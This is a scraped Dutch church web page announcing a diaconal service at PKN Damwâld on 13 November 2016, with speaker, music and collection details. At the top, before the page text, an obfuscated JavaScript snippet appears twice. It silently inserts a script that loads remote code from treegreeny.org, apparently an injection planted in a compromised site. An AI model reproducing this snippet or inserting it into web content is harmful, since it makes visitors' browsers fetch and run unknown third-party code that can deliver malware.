;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 13 november 2016 14:00 uur - PKN Damwâld
zondag 13 november 2016
14:00 uur

Kerkdienst zondag 13 november 2016 14:00 uur

Thema: Speciale diaconale dienst ! M.m.v. gastspreker TEAR en gospelband Promise

Als het gaat over arm en rijk maken jouw keuzes een verschil. Voor anderen én voor jezelf. Strijden tegen armoede en voor gerechtigheid kun je op veel manieren doen. Door na te denken over je levensstijl en de gevolgen daarvan voor de armen. Door mee te doen met campagnes en acties. En ook door te geven en te bidden. Komende zondagmiddag gaat een inspirerende en bevlogen spreker van de christelijke hulporganisatie TEAR met ons nadenken over hoe wij hulp aan medemensen kunnen bieden. Soms is dat best moeilijk: want is hulp geen druppel op de gloeiende plaat? Wat voegt het toe? We horen niet alleen over concrete voorbeelden van hulpverlening, we worden ook uitgedaagd om na te denken over wat wij kunnen betekenen.

 Extra speciaal is de muzikale medewerking van het gospelduo PROMISE !aanbevolen-2

 

Informatie

Voorganger:Ds. G. Timmer
Organist:Gospelband Promise
Thema:Speciale diaconale dienst ! M.m.v. gastspreker TEAR en gospelband Promise
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Steun mensen in een sociaal isolement

Mensen die eenzaam zijn, schulden hebben of verslaafd zijn, voelen zich vaak alleen staan. Het Interkerkelijk Diaconaal Overleg in Lelystad zet zich, met steun van Kerk in Actie, in voor deze mensen. Inloopcentrum Waterwijk is er bijvoorbeeld voor wie op zoek is naar warmte en steun. Men kan er terecht voor een kopje koffie, een praatje, een warme maaltijd of naailes. In inloophuis Open Haven krijgen mensen met verslavingsproblemen voorlichting en advies en kunnen ze vier keer per week aanschuiven voor een warme maaltijd. Ook is er een voedselbank en schuldhulpverlening voor mensen met financiële problemen. Vandaag collecteren we voor het diaconale werk in Nederland, zoals dat van het Interkerkelijke Diaconaal Overleg in Lelystad.

Tweede collecte: Kerk
Uitganscollecte: Kerk